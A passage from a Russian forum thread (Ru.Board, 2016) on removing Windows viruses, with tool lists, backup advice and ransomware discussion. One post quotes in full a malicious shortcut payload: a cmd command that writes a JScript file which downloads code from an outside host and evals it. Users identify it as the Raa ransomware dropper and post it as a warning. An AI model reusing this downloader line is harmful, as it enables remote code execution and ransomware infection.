Перейти из форума на сайт.

НовостиФайловые архивы
ПоискАктивные темыТоп лист
ПравилаКто в on-line?
Вход Забыли пароль? Первый раз на этом сайте? Регистрация
Компьютерный форум Ru.Board » Операционные системы » Microsoft Windows » Закладки » Вирус(ы) в Windows XP,Vista,7,8,8.1,10. Проблемы. Решения.

Модерирует : KLASS, IFkO

KLASS (16-02-2017 18:32): Продолжение в Вирус(ы) в ОС Windows. Проблемы. Решения. (II)  Версия для печати • ПодписатьсяДобавить в закладки
Страницы: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141

   

HDD



Platinum Member
Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору

Вирусы в Windows XP, Vista, 7, 8, 8.1, 10. Проблемы. Решения.


Стандартные действия

Вариант №1

1. Скачиваем Dr.Web LiveDisk - Ссылка ведёт на страницу загрузки, записываем диск, загружаемся и проверяем системы на вирусы.  
И\или
Скачиваем Kaspersky Rescue Disk - Ссылка ведёт на страницу загрузки: на ядре Linux (вирусы под win не пройдут, а под *nix их нету по крайней мере живых), ядро от десятой версии и изменена "никсовая" оболочка. Обновление происходит раз в неделю. Записываем диск, загружаемся и проверяем системы на вирусы.
Вариант №2

1. Скачиваем загрузочный диск на базе LiveCD (Ссылки в Варезнике LiveCD/BootCD (DVD/USB) на базе OPK WinPE)
2. Скачиваем антивирусы работающие без инсталляции.
2.1 Dr.Web CureIT! - Ссылка ведёт на страницу загрузки  
2.2 Kaspersky Virus Removal Tool (AVPTool) - Ссылка ведёт на страницу загрузки  
3. Прожигаем скачанный LiveCD на болванку, перезагружаемся, выставляем в биосе загрузку с CD\DVD(Что бы зайти в биос, нужно нажимать после включения компьютера кнопки Del или F2, зависит от производителя материнской платы.) На некоторых материнских платах, возможно вызвать Boot Menu нажав F8 при загрузке и выбрать загрузку с CD\DVD не заходя в биос.  
4. Проверяем одной утилитой, перезагружаемся, проверяем второй утилитой, пытаемся загрузить систему.  
Желательно отключить систему восстановления. Свойства системы-система восстановления.

Разница между вариантом №1 и вариантом №2 заключается в следующем:
Если нет возможности скачать LiveCD, то проверяйте компьютер в безопасном режиме. При загрузке нажимать F8, выбрать верхний пункт(Safe Mode или безопасный режим). В этом случае при сохранение CureIt и AVPTool к себе на компьютер переименовывайте файлы. Ряд вирус блокирует запуск при стандартном имени файла.
Это стандартные действия, которые не гарантируют восстановление работоспособности ОС, НО! 90% проблем решается таким способом.
Если не помогает, то скачиваем AVZ, сканируем и выкладываем лог. Обязательно указываем какая версия Windows.

Полезные инструменты(утилиты)
Sysinternals (Microsoft) Process Explorer - Выдает подробнейшую информацию обо всех запущенных процессах, включая владельца, использование памяти, задействованные библиотеки и т.д.
Sysinternals (Microsoft) Autoruns - Позволяет контролировать автозагрузку запускающихся при старте операционной системы сервисов, приложений и других компонентов.
Sysinternals (Microsoft) Process Monitor - программа для мониторинга файловой системы, реестра и процессов в оперативной памяти. Filemon+Regmon
HijackThis - программа для удаления невидимых spyware
AutoLogger - автоматический сборщик логов, более подробное описание утилиты смотрите на странице скачивания.
AdwCleaner - программа для удаления тулбаров, adware и другого рекламного мусора.
MBRCheck - утилита для проверки MBR на предмет заражения современными "руткитами"
RegASSASSIN - Программа для удаления "заблокированных" веток и ключей в реестре из-за mailware
SmartFix - Эффективная программа для быстрого автоматического исправления неполадок.
Когда нужны? Когда есть работающая система, но есть подозрения, что дело "нечисто".  

Темы на форуме

Помощь при лечении компьютера от вирусов - помощь от "хелперов" с "VirusInfo". В топике строгие правила. Внимательно читаем шапку.
Антивирусы (Antivirus'ы) не требующие инсталяции - кому не хватает CureIT и AVPTool
AVZ - Anti-SpyWare, Anti-AdWare
Восстановление Windows - Как вернуть Windows к жизни без переустановки
Windows заблокирован! - отдельный топик по решению проблем с вирусом блокирующим запуск ОС и требующем выслать денег по СМС.
Обзор антивирусов(и др. средств безопасности на их основе) под Windоws 98/XP/Vista/7/8/8.1/10  
Тема посвящённая Kido, Conficker, Downadup
Полезные ссылки в интернете

Чистые системные файлы Windows, которые заражают блокеры - ссылка ведёт на страницу закачки
Поиск описания  вирусов по названию
Советы по лечению ПК от Олега Зайцева, автора Avz
Ручное лечение компьютера от вирусов - Спец.форум по проблемам с вирусамих.
Очистка Windows от вирусов - Статья от FuzzyL
Список "левых" служб, ссылающихся на svchost.exe, для WindowsXP
Страница VirusHunter`a - "Диспетчер задач\реестр\настройки рабочего стола  заблокирован(ы) .." Подборка полезных "точечных"  утилит.  
Безопасный Интернет. Универсальная защита для Windows ME - Vista - автор-составитель антивирусный эксперт, золотой бета-тестер Лаборатории Касперского Николай Головко
 
Шапка ©HDD
Вопросы по шапке здесь

Всего записей: 14819 | Зарегистр. 15-03-2003 | Отправлено: 23:20 18-09-2009 | Исправлено: KLASS, 18:48 16-02-2017
dddimmm



Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
lab14
да, в курсе этой "примочки", другие варианты какие нибудь использовали?

Всего записей: 1857 | Зарегистр. 28-07-2007 | Отправлено: 14:03 25-05-2016
lab14

Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
А зачем? Я даже этой "примочкой" не пользуюсь...
Мне вполне хватает еженедельного  "бекапа на внешние устройства", сформированного программой FBackup.
Кроме того, я считаю Dr.Web достаточно надёжным антивирусом (в т.ч. и в плане защиты от шифровальщиков) + мой более 20-летнмй опыт работы с компьютерами.

Всего записей: 650 | Зарегистр. 04-11-2012 | Отправлено: 14:35 25-05-2016
dddimmm



Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
lab14
каким образом подключается внешнее устройство? архивация проходит в автоматическом режиме?
после архивации внешнее устройство как то изолируется?

Всего записей: 1857 | Зарегистр. 28-07-2007 | Отправлено: 18:05 25-05-2016
lab14

Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
dddimmm, я считаю, в этом деле требуется комплексный подход.
Тут ведь многое зависит от важности защищаемых документов, их объёма и периодичности их изменений.
Скажем, семейные фотографии и видео - несомнено важные документы на домашнем компьютере. Однако, во-первых, они не относятся к часто изменяемым, а во вторых - их источником служат в современном мире всякие гаджеты - мобильные телефоны, планшеты, цифровые фотоаппараты, на которых некоторое время (бывает и месяцами) сохраняются оригиналы. Поэтому я архивирую их на внешний носитель примерно раз в месяц (вручную). Внешний носитель - жёсткий диск по USB.
Мои личные документы - (.doc, .xls, txt и т.п.), различные чертежи и базы данных, сканы и копии меняются тоже не часто, но так как они находятся в единственном экземляре, архивирую примерно раз в неделю.
Сюда же включаются внешние документы (производственные, других людей), которые бывает обрабатываются на личном домашнем компьютере. Хотя их важность обычно выше большинства личных документов, однако учитывая что их копии есть как на флэшках (на которых их принесли), так и на первоисточниках, архивации примерно раз в неделю также достаточно.
Архивация производится бесплатной программой для резервного копирования FBackup  из кучки различных папок в zip-файл, который потом вручную копируется на внешний носитель- специально выделенную флэшку.
Считаю, что всё вышеприведённое + хороший антивирус сводят практическу к нулю потерю важных файлов (в т.ч. и при выходе из строя жёсткого диска).
 
P.S. Естественно, эти рассуждения относятся личному домашнему компьютеру.

Всего записей: 650 | Зарегистр. 04-11-2012 | Отправлено: 20:52 25-05-2016 | Исправлено: lab14, 21:28 25-05-2016
dddimmm



Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
lab14
спасибо за развернутый ответ, для себя решил, буду делать архив в закрытую область жесткого диска + облачное хранилище

Всего записей: 1857 | Зарегистр. 28-07-2007 | Отправлено: 06:20 26-05-2016
lab14

Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
делать архив в закрытую область жесткого диска

На том же диске, где и целевые документы? Но ведь в данном случае не гарантируется сохранность важных файлов в случае выхода из строя этого жёсткого диска. А как организовывается эта область?

Цитата:
делать архив в ... облачное хранилище

У меня только видео-фото архив более 130 Гб ...
Купил внешний бокс типа:
 

 
за 700 р. Вставил туда старый диск SATA 200 Гб

Всего записей: 650 | Зарегистр. 04-11-2012 | Отправлено: 07:34 26-05-2016 | Исправлено: lab14, 08:06 26-05-2016
megaplast

Junior Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Парни везде на сайтах появилась навязчивая реклама, никак убрать не могу. Касперыч виросов не видет, доктор вэб нашёл изменения в хосте (вылечил), но в целом нечего не поменялось. Куда копать как узнать откуда это зло лезет, во всех браузерах в Microsoft Edge, Firefox?????????
 
Ссылка баннера на вирусную рекламу
http://latest-404435.onpato.ru/protJS/PjpxFg4mExYDBAdEXVVKShYDDkZcSkVIRB4NFQETCRYhJkNJUmdjIA0PYEBTVVdKVFRIRAQLBwwtAkpdUFJRXVdcUV5UXnFWX0AkMzoDAiwbCCoIEgIuAERSChMECEpKBRYJHxcDGjgABQMnBVFYJTQ%2FCEdgCQE5DhdEXVRKSjIPGyAHHAZGXEpGGw%3D%3D
 
Добавлено:
В общем проблему с проклятой рекламой c http://latest-404435.onpato.ru получилось решить удалив все файлы по директории C:\Windows\System32\drivers\etc,   кроме файла hosts.

Всего записей: 126 | Зарегистр. 19-10-2004 | Отправлено: 14:30 01-06-2016
moroka33



Silver Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
megaplast

Цитата:
получилось решить удалив все файлы

А вариант сформировать блокирующую запись и добавить в файл hosts и urlfilter.ini для тех браузеров, у которых он имеется не рассматривали?

Всего записей: 4273 | Зарегистр. 31-07-2009 | Отправлено: 19:14 01-06-2016 | Исправлено: moroka33, 19:15 01-06-2016
emil9



Silver Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
megaplast
adwcleaner не помог?

Всего записей: 2090 | Зарегистр. 16-10-2002 | Отправлено: 13:16 02-06-2016
Johnson007



Newbie
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
 я считаю Dr.Web достаточно надёжным антивирусом (в т.ч. и в плане защиты от шифровальщиков) + мой более 20-летнмй опыт работы с компьютерами.

Да???
А вот сам Dr.Web  так не считает!  
Пруф хотите?
Будьте любезны: http://news.drweb.ru/show/?i=10034

Всего записей: 24 | Зарегистр. 05-10-2015 | Отправлено: 21:11 01-07-2016
emil9



Silver Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Johnson007
я как бы тоже не поклонник докторвеба, но он детектит вирус (то есть заражения не произойдет ), другое дело что расшифровать не сможет зашифрованные файлы, но это и другие антивирусы не осилят.

Всего записей: 2090 | Зарегистр. 16-10-2002 | Отправлено: 21:45 01-07-2016 | Исправлено: emil9, 21:46 01-07-2016
Johnson007



Newbie
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
я как бы тоже не поклонник докторвеба, но он детектит вирус (то есть заражения не произойдет ), другое дело что расшифровать не сможет зашифрованные файлы, но это и другие антивирусы не осилят.

Я как бы тоже не его поклонник, могу дать пруфы и на Лабораторию, с аналогичными комментариями.
Но прежде чем что-то написать, нужно подумать.
Ни один (!!!) антивирус шифровальщик не детектит.
Ибо в привычном понимании это всего-навсего исполняемый, причем исполняемый по желанию юзера, файл...
Насчет того, что антивирусы расшифровывают 1024-битное шифрование (хД)-это что-то новое. (хД)
А по сабжу-после запуска вложения в письме заражение происходит вне зависимости от типа установленной защиты.
Без обид, но учите матчасть...

Всего записей: 24 | Зарегистр. 05-10-2015 | Отправлено: 10:28 02-07-2016
moroka33



Silver Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Johnson007

Цитата:
Ни один (!!!) антивирус шифровальщик не детектит.

На момент его появления в системе и начала работы - шифрования, да. Но, ежели через диспетчер задач и контроль температуры камня (ней) и дисков отслеживать состояние системы, а при появлении необоснованной активности (резком повышении температуры процессора (ров) выявить в процессах причину (процессы шифровальщика имеют выделяющиеся цифробуквенные имена) и завершить его, то утилита "Зоркий глаз" заразу перехватит и остановит ее распространение на всех дисках и в т.ч. флехах.
Проверено на собственном опыте (ОСь ХР3) при заражении шифровальщиком с рекламной страницы алиекспресс на русфолдере. Вторым отреагировал Есет...)))
По причине, указанной ув. Johnson007

Цитата:
это всего-навсего исполняемый, причем исполняемый по желанию юзера, файл...

шифровальщики на автоуровне трудно уловимы, во всяком случае пока, надо быть внимательнее и приглядывать за состоянием машины...) С тех пор на время работы держу активным диспетчер задач и контроль температуры дисков и камня.

Всего записей: 4273 | Зарегистр. 31-07-2009 | Отправлено: 13:18 02-07-2016 | Исправлено: moroka33, 13:53 02-07-2016
emil9



Silver Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Johnson007
А где противоречие в моих словах? Я и сказал что антивирус   не расшифровывает файлы   с  стойким алгоритмом шифрования, но утилиты от антивирусных компаний некоторые зашифрованные файлы могут расшифровать.Насчёт исполняемого файла читайте внимательнее, я написал вирус , а не шифровальщик (хотя в обиходе юзеры не различают эти понятия),имелись в виду не легитимные утилиты для шифрования , а непосредственно малварь которая загружает его в систему. Под шифровальщиком имелась в виду малварь которую детектят кто сигнатурно, а кто облачно, а кто и вовсе никак не детектит.
И кстати поведенческий анализ ещё никто не отменял.поставьте хитман про алерт и потестьте сами если не верите.

Всего записей: 2090 | Зарегистр. 16-10-2002 | Отправлено: 15:03 02-07-2016 | Исправлено: emil9, 15:22 02-07-2016
MouhcineFD

BANNED
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Можно ли запускать в DrWeb LiveCD сторонние программа?

Всего записей: 16 | Зарегистр. 30-11-2012 | Отправлено: 22:27 07-07-2016
KismetT_v3



Silver Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
Можно ли запускать в DrWeb LiveCD сторонние программа?

В принципе кое-какие виндовые приложения можно запускать через Wine, который есть на DrWeb LiveCD. Но всё подряд работать не будет, однозначно.
Вот например работает AdwCleaner, правда потом завершается с ошибкой.


----------
Это я .... И это тоже я .... Мы из этих

Всего записей: 2474 | Зарегистр. 08-04-2016 | Отправлено: 23:39 07-07-2016 | Исправлено: KismetT_v3, 00:03 08-07-2016
GREENcode

Full Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
Можно ли запускать в DrWeb LiveCD сторонние программа?

Если он на Linux'е, то можно, по логике, запускать бинарники, сделанные для Linux. А Wine на LiveCD антивируса для запуска Windows-программ — совершенно ненужный костыль.

Всего записей: 455 | Зарегистр. 03-10-2015 | Отправлено: 14:25 08-07-2016
glass4217

Newbie
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Ребята новая угроза. в почту прислали файл АКТ.doc.lnk (типа тупо ярлык)
но в пути у ярлыка обнаружился интересный код

Код:
%windir%\system32\cmd.exe /c REM.>as.js&echo var c=["Msxml2.ServerXMLHTTP.6.0","GET","http://say-bowbow.com/src/gate.php?a","open","send","responseText"];var er= new ActiveXObject(c[0]);er[c[3]](c[1],c[2],false);er[c[4]]();eval(er[c[5]]);>as.js&as.js

 
Пассивный антивирус который я чуть раньше сюда выкинул предположительно его не перехватит(еще не проверял на виртуалке)
Ребят будьте бдительны.

Всего записей: 28 | Зарегистр. 10-04-2010 | Отправлено: 11:09 18-07-2016
KismetT_v3



Silver Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Не работает. http://say-bowbow.com/cgi-sys/suspendedpage.cgi?a - This Account has been suspended.
 

 


----------
Это я .... И это тоже я .... Мы из этих

Всего записей: 2474 | Зарегистр. 08-04-2016 | Отправлено: 15:32 18-07-2016
regist123



Gold Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
glass4217 12:09 18-07-2016
Цитата:
Ребята новая угроза. в почту прислали файл АКТ.doc.lnk (типа тупо ярлык)  но в пути у ярлыка обнаружился интересный код

Это шифровальщик Raa, вот его описание.
KismetT_v3
ссылку на всякий случай деактивируйте, сервер может позже заработать.
 
Добавлено:
12:09 18-07-2016
Цитата:
в почту прислали файл АКТ.doc.lnk (типа тупо ярлык)

Дополню, что ярлык имеет иконку вордовского документа и двойное расширение типа doc.lnk как раз должно заставить пользователя думать, что это обычный вордовский документ. Как рабочая папка используется %temp%

Всего записей: 7189 | Зарегистр. 20-03-2009 | Отправлено: 19:41 18-07-2016 | Исправлено: regist123, 19:44 18-07-2016
   

Страницы: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141

Компьютерный форум Ru.Board » Операционные системы » Microsoft Windows » Закладки » Вирус(ы) в Windows XP,Vista,7,8,8.1,10. Проблемы. Решения.
KLASS (16-02-2017 18:32): Продолжение в Вирус(ы) в ОС Windows. Проблемы. Решения. (II)


Реклама на форуме Ru.Board.

Powered by Ikonboard "v2.1.7b" © 2000 Ikonboard.com
Modified by Ru.B0ard
© Ru.B0ard 2000-2024

BitCoin: 1NGG1chHtUvrtEqjeerQCKDMUi6S6CG4iC

Рейтинг.ru